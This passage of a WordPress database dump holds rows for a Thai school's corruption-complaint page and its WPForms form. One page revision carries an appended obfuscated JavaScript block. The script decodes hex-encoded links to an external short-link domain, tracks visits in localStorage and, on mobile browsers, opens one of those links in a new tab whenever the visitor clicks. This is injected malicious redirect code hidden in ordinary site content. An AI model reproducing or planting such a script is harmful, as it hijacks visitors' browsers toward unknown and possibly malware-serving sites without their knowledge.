04:04:48','',474,'http://pakhaeng.ssk.in.th/?p=475',0,'revision','',0),
(476,1,'2024-08-02 11:05:41','2024-08-02 04:05:41','<!-- wp:image {\"id\":1513,\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353-1.png\" alt=\"\" class=\"wp-image-1513\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"af28c81c\",\"blockVersion\":3} -->\n<h2 class=\"gb-headline gb-headline-af28c81c gb-headline-text\"></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:kadence/tabs {\"uniqueID\":\"476_934328-1a\",\"currentTab\":3,\"minHeight\":31,\"maxWidth\":974,\"contentBgColor\":\"#fcb900\",\"contentBorderStyles\":[{\"top\":[\"#cf2e2e\",\"\",3],\"right\":[\"#cf2e2e\",\"\",3],\"bottom\":[\"#cf2e2e\",\"\",3],\"left\":[\"#cf2e2e\",\"\",3],\"unit\":\"px\"}],\"contentBorderRadius\":[5,5,5,5],\"titles\":[{\"text\":\"ไปรษณีย์\",\"icon\":\"fe_user\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"E-mail.\",\"icon\":\"fe_mail\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"ออนไลน์\",\"icon\":\"fe_globe\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"}],\"titleColor\":\"#ff6900\",\"titleColorHover\":\"#ffffff\",\"titleColorActive\":\"#ffffff\",\"titleBg\":\"#8ed1fc\",\"titleBgHover\":\"#fcb900\",\"titleBgActive\":\"#fcb900\",\"titleBorder\":\"#0693e3\",\"size\":\"md\",\"lineHeight\":10,\"tabSize\":\"\",\"mobileSize\":\"\",\"fontWeight\":\"400\",\"textTransform\":\"capitalize\",\"verticalTabWidth\":[16,\"\",\"\"]} -->\n<div class=\"wp-block-kadence-tabs alignnone\"><div class=\"kt-tabs-wrap kt-tabs-id476_934328-1a kt-tabs-has-3-tabs kt-active-tab-3 kt-tabs-layout-tabs kt-tabs-tablet-layout-inherit kt-tabs-mobile-layout-inherit kt-tab-alignment-left \"><ul class=\"kt-tabs-title-list\"><li id=\"tab-\" class=\"kt-title-item kt-title-item-1 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-inactive\"><a href=\"#tab-\" data-tab=\"1\" class=\"kt-tab-title kt-tab-title-1 \"><span data-name=\"fe_user\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">ไปรษณีย์</span></a></li><li id=\"tab-e-mail\" class=\"kt-title-item kt-title-item-2 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-inactive\"><a href=\"#tab-e-mail\" data-tab=\"2\" class=\"kt-tab-title kt-tab-title-2 \"><span data-name=\"fe_mail\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">E-mail.</span></a></li><li id=\"tab-\" class=\"kt-title-item kt-title-item-3 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-active\"><a href=\"#tab-\" data-tab=\"3\" class=\"kt-tab-title kt-tab-title-3 \"><span data-name=\"fe_globe\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">ออนไลน์</span></a></li></ul><div class=\"kt-tabs-content-wrap\"><!-- wp:kadence/tab {\"uniqueID\":\"687785-10\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-1 kt-inner-tab687785-10\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:list -->\n<ul class=\"wp-block-list\"><!-- wp:list-item -->\n<li>ที่ตั้ง 94 หมู่ที่ 6 ตำบลโพธิ์  อำเภอโนนคูณ จังหวัดศรีสะเกษ  33250</li>\n<!-- /wp:list-item --></ul>\n<!-- /wp:list --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":2,\"uniqueID\":\"a205fc-91\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-2 kt-inner-taba205fc-91\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:list -->\n<ul class=\"wp-block-list\"><!-- wp:list-item -->\n<li>33010169@sisaketedu1.go.th</li>\n<!-- /wp:list-item --></ul>\n<!-- /wp:list --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":3,\"uniqueID\":\"5484db-9d\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-3 kt-inner-tab5484db-9d\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/image {\"id\":1733,\"sizeSlug\":\"large\",\"link\":\"https://script.google.com/macros/s/AKfycbykXdw223qDku5HZHXFc3dC3iBuYGklOMMgSwrL2niYi_0cBsuDlso21Pkuaws5E3bp/exec\",\"linkDestination\":\"custom\",\"uniqueID\":\"476_77c7af-0b\"} -->\n<figure class=\"wp-block-kadence-image kb-image476_77c7af-0b size-large\"><a href=\"https://script.google.com/macros/s/AKfycbykXdw223qDku5HZHXFc3dC3iBuYGklOMMgSwrL2niYi_0cBsuDlso21Pkuaws5E3bp/exec\" class=\"kb-advanced-image-link\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/corruption-1024x256.png\" alt=\"\" class=\"kb-img wp-image-1733\"/></a></figure>\n<!-- /wp:kadence/image --></div></div>\n<!-- /wp:kadence/tab --></div></div></div>\n<!-- /wp:kadence/tabs -->\n\n<!-- wp:paragraph {\"fontSize\":\"medium\"} -->\n<p class=\"has-medium-font-size\"></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->','ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ','','publish','closed','closed','','%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80','','','2025-07-07 14:12:32','2025-07-07 07:12:32','',0,'http://pakhaeng.ssk.in.th/?page_id=476',0,'page','',0),
(477,1,'2024-08-02 11:05:41','2024-08-02 04:05:41','<!-- wp:wpforms/form-selector {\"clientId\":\"37f6bc19-1428-4fb0-9674-7bf63a14ccd0\",\"formId\":\"474\",\"copyPasteJsonValue\":\"{\\u0022displayTitle\\u0022:false,\\u0022displayDesc\\u0022:false,\\u0022theme\\u0022:\\u0022default\\u0022,\\u0022themeName\\u0022:\\u0022\\u0022,\\u0022fieldSize\\u0022:\\u0022medium\\u0022,\\u0022backgroundImage\\u0022:\\u0022none\\u0022,\\u0022backgroundPosition\\u0022:\\u0022center center\\u0022,\\u0022backgroundRepeat\\u0022:\\u0022no-repeat\\u0022,\\u0022backgroundSizeMode\\u0022:\\u0022cover\\u0022,\\u0022backgroundSize\\u0022:\\u0022cover\\u0022,\\u0022backgroundWidth\\u0022:\\u0022100px\\u0022,\\u0022backgroundHeight\\u0022:\\u0022100px\\u0022,\\u0022backgroundUrl\\u0022:\\u0022url()\\u0022,\\u0022backgroundColor\\u0022:\\u0022rgba( 0, 0, 0, 0 )\\u0022,\\u0022fieldBorderRadius\\u0022:\\u00223px\\u0022,\\u0022fieldBorderStyle\\u0022:\\u0022solid\\u0022,\\u0022fieldBorderSize\\u0022:\\u00221px\\u0022,\\u0022fieldBackgroundColor\\u0022:\\u0022#ffffff\\u0022,\\u0022fieldBorderColor\\u0022:\\u0022rgba( 0, 0, 0, 0.25 )\\u0022,\\u0022fieldTextColor\\u0022:\\u0022rgba( 0, 0, 0, 0.7 )\\u0022,\\u0022fieldMenuColor\\u0022:\\u0022#ffffff\\u0022,\\u0022labelSize\\u0022:\\u0022medium\\u0022,\\u0022labelColor\\u0022:\\u0022rgba( 0, 0, 0, 0.85 )\\u0022,\\u0022labelSublabelColor\\u0022:\\u0022rgba( 0, 0, 0, 0.55 )\\u0022,\\u0022labelErrorColor\\u0022:\\u0022#d63637\\u0022,\\u0022buttonSize\\u0022:\\u0022medium\\u0022,\\u0022buttonBorderStyle\\u0022:\\u0022none\\u0022,\\u0022buttonBorderSize\\u0022:\\u00221px\\u0022,\\u0022buttonBorderRadius\\u0022:\\u00223px\\u0022,\\u0022buttonBackgroundColor\\u0022:\\u0022#066aab\\u0022,\\u0022buttonTextColor\\u0022:\\u0022#ffffff\\u0022,\\u0022buttonBorderColor\\u0022:\\u0022#066aab\\u0022,\\u0022pageBreakColor\\u0022:\\u0022#066aab\\u0022,\\u0022containerPadding\\u0022:\\u00220px\\u0022,\\u0022containerBorderStyle\\u0022:\\u0022none\\u0022,\\u0022containerBorderWidth\\u0022:\\u00221px\\u0022,\\u0022containerBorderColor\\u0022:\\u0022#000000\\u0022,\\u0022containerBorderRadius\\u0022:\\u00223px\\u0022,\\u0022containerShadowSize\\u0022:\\u0022none\\u0022,\\u0022customCss\\u0022:\\u0022\\u0022}\"} /-->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ','','inherit','closed','closed','','476-revision-v1','','','2024-08-02 11:05:41','2024-08-02 04:05:41','',476,'http://pakhaeng.ssk.in.th/?p=477',0,'revision','',0),
(478,1,'2024-08-02 11:21:53','2024-08-02 04:21:53','{\"fields\":{\"2\":{\"id\":\"2\",\"type\":\"name\",\"label\":\"\\u0e0a\\u0e37\\u0e48\\u0e2d-\\u0e2a\\u0e01\\u0e38\\u0e25 \\u0e1c\\u0e39\\u0e49\\u0e23\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e23\\u0e35\\u0e22\\u0e19\",\"format\":\"first-last\",\"description\":\"\\u0e0a\\u0e37\\u0e48\\u0e2d-\\u0e19\\u0e32\\u0e21\\u0e2a\\u0e01\\u0e38\\u0e25 \\u0e1c\\u0e39\\u0e49\\u0e23\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e23\\u0e35\\u0e22\\u0e19\",\"required\":\"1\",\"size\":\"medium\",\"simple_placeholder\":\"\",\"simple_default\":\"\",\"first_placeholder\":\"\",\"first_default\":\"\",\"middle_placeholder\":\"\",\"middle_default\":\"\",\"last_placeholder\":\"\",\"last_default\":\"\",\"css\":\"\"},\"3\":{\"id\":\"3\",\"type\":\"textarea\",\"label\":\"\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e22\\u0e39\\u0e48\",\"description\":\"\\u0e40\\u0e0a\\u0e48\\u0e19 94 \\u0e2b\\u0e21\\u0e39\\u0e48  6 \\u0e15\\u0e33\\u0e1a\\u0e25\\u0e42\\u0e1e\\u0e18\\u0e34\\u0e4c  \\u0e2d\\u0e33\\u0e40\\u0e20\\u0e2d\\u0e42\\u0e19\\u0e19\\u0e04\\u0e39\\u0e13 \\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e31\\u0e14\\u0e28\\u0e23\\u0e35\\u0e2a\\u0e30\\u0e40\\u0e01\\u0e29 33250\",\"required\":\"1\",\"size\":\"medium\",\"placeholder\":\"\",\"limit_count\":\"1\",\"limit_mode\":\"characters\",\"default_value\":\"\",\"css\":\"\"},\"4\":{\"id\":\"4\",\"type\":\"number\",\"label\":\"\\u0e40\\u0e1a\\u0e2d\\u0e23\\u0e4c\\u0e42\\u0e17\\u0e23\\u0e28\\u0e31\\u0e1e\\u0e17\\u0e4c (\\u0e17\\u0e35\\u0e48\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e15\\u0e34\\u0e14\\u0e15\\u0e48\\u0e2d\\u0e01\\u0e25\\u0e31\\u0e1a\\u0e44\\u0e14\\u0e49)\",\"description\":\"\\u0e15\\u0e31\\u0e27\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07 : 08x-xxx-xxxx\",\"required\":\"1\",\"size\":\"medium\",\"placeholder\":\"\",\"default_value\":\"\",\"css\":\"\"},\"5\":{\"id\":\"5\",\"type\":\"email\",\"label\":\"Email\",\"description\":\"\\u0e01\\u0e23\\u0e38\\u0e13\\u0e32\\u0e43\\u0e2a\\u0e48 \\u0e2d\\u0e35\\u0e40\\u0e21\\u0e25\",\"required\":\"1\",\"size\":\"medium\",\"placeholder\":\"\",\"confirmation_placeholder\":\"\",\"default_value\":false,\"filter_type\":\"\",\"allowlist\":\"\",\"denylist\":\"\",\"css\":\"\"},\"6\":{\"id\":\"6\",\"type\":\"name\",\"label\":\"\\u0e0a\\u0e37\\u0e48\\u0e2d-\\u0e19\\u0e32\\u0e21\\u0e2a\\u0e01\\u0e38\\u0e25 \\u0e1c\\u0e39\\u0e49\\u0e16\\u0e39\\u0e01\\u0e23\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e23\\u0e35\\u0e22\\u0e19\",\"format\":\"first-last\",\"description\":\"\",\"required\":\"1\",\"size\":\"medium\",\"simple_placeholder\":\"\",\"simple_default\":\"\",\"first_placeholder\":\"\",\"first_default\":\"\",\"middle_placeholder\":\"\",\"middle_default\":\"\",\"last_placeholder\":\"\",\"last_default\":\"\",\"css\":\"\"},\"7\":{\"id\":\"7\",\"type\":\"select\",\"label\":\"\\u0e15\\u0e33\\u0e41\\u0e2b\\u0e19\\u0e48\\u0e07\",\"choices\":{\"1\":{\"default\":\"1\",\"label\":\"\\u0e1c\\u0e39\\u0e49\\u0e2d\\u0e33\\u0e19\\u0e27\\u0e22\\u0e01\\u0e32\\u0e23\\u0e42\\u0e23\\u0e07\\u0e40\\u0e23\\u0e35\\u0e22\\u0e19\",\"value\":\"\",\"image\":\"\",\"icon\":\"face-smile\",\"icon_style\":\"regular\"},\"2\":{\"label\":\"\\u0e04\\u0e23\\u0e39\\u0e1c\\u0e39\\u0e49\\u0e2a\\u0e2d\\u0e19\",\"value\":\"\",\"image\":\"\",\"icon\":\"face-smile\",\"icon_style\":\"regular\"},\"3\":{\"label\":\"\\u0e40\\u0e08\\u0e49\\u0e32\\u0e2b\\u0e19\\u0e49\\u0e32\\u0e17\\u0e35\\u0e48\\u0e18\\u0e38\\u0e23\\u0e01\\u0e32\\u0e23\",\"value\":\"\",\"image\":\"\",\"icon\":\"face-smile\",\"icon_style\":\"regular\"},\"4\":{\"label\":\"\\u0e19\\u0e31\\u0e01\\u0e01\\u0e32\\u0e23\\u0e20\\u0e32\\u0e23\\u0e42\\u0e23\\u0e07\",\"value\":\"\",\"image\":\"\",\"icon\":\"face-smile\",\"icon_style\":\"regular\"}},\"description\":\"\",\"required\":\"1\",\"style\":\"classic\",\"size\":\"medium\",\"placeholder\":\"\",\"dynamic_choices\":\"\",\"css\":\"\"},\"9\":{\"id\":\"9\",\"type\":\"text\",\"label\":\"\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e23\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e23\\u0e35\\u0e22\\u0e19\",\"description\":\"\\u0e01\\u0e23\\u0e2d\\u0e01\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e23\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e23\\u0e35\\u0e22\\u0e19\",\"size\":\"medium\",\"placeholder\":\"\",\"limit_count\":\"1\",\"limit_mode\":\"characters\",\"default_value\":\"\",\"input_mask\":\"\",\"css\":\"\"},\"8\":{\"id\":\"8\",\"type\":\"textarea\",\"label\":\"\\u0e23\\u0e32\\u0e22\\u0e25\\u0e30\\u0e40\\u0e2d\\u0e35\\u0e22\\u0e14\",\"description\":\"\\u0e23\\u0e32\\u0e22\\u0e25\\u0e30\\u0e40\\u0e2d\\u0e35\\u0e22\\u0e14 \\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e23\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e23\\u0e35\\u0e22\\u0e19\",\"required\":\"1\",\"size\":\"medium\",\"placeholder\":\"\",\"limit_count\":\"1\",\"limit_mode\":\"characters\",\"default_value\":\"\",\"css\":\"\"},\"10\":{\"id\":\"10\",\"type\":\"checkbox\",\"label\":\"\\u0e40\\u0e2d\\u0e01\\u0e2a\\u0e32\\u0e23 \\/ \\u0e2b\\u0e25\\u0e31\\u0e01\\u0e10\\u0e32\\u0e19\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e40\\u0e15\\u0e34\\u0e21 (\\u0e16\\u0e49\\u0e32\\u0e21\\u0e35) \\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e08\\u0e31\\u0e14\\u0e2a\\u0e48\\u0e07\\u0e44\\u0e14\\u0e49\\u0e17\\u0e32\\u0e07 E-mail : \",\"choices\":{\"1\":{\"label\":\"First Choice\",\"value\":\"\",\"image\":\"\",\"icon\":\"face-smile\",\"icon_style\":\"regular\"},\"2\":{\"label\":\"Second Choice\",\"value\":\"\",\"image\":\"\",\"icon\":\"face-smile\",\"icon_style\":\"regular\"},\"3\":{\"label\":\"Third Choice\",\"value\":\"\",\"image\":\"\",\"icon\":\"face-smile\",\"icon_style\":\"regular\"}},\"choices_images_style\":\"modern\",\"choices_icons_color\":\"#066aab\",\"choices_icons_size\":\"large\",\"choices_icons_style\":\"default\",\"description\":\"\",\"input_columns\":\"\",\"choice_limit\":\"\",\"dynamic_choices\":\"\",\"css\":\"\"}},\"id\":\"474\",\"field_id\":11,\"settings\":{\"form_title\":\"\\u0e0a\\u0e48\\u0e2d\\u0e07\\u0e17\\u0e32\\u0e07\\u0e41\\u0e08\\u0e49\\u0e07\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e23\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e23\\u0e35\\u0e22\\u0e19\\u0e01\\u0e32\\u0e23\\u0e17\\u0e38\\u0e08\\u0e23\\u0e34\\u0e15\\u0e41\\u0e25\\u0e30\\u0e1b\\u0e23\\u0e30\\u0e1e\\u0e24\\u0e15\\u0e34\\u0e21\\u0e34\\u0e0a\\u0e2d\\u0e1a\",\"form_desc\":\"\",\"submit_text\":\"Submit\",\"submit_text_processing\":\"Sending...\",\"form_class\":\"\",\"submit_class\":\"\",\"aja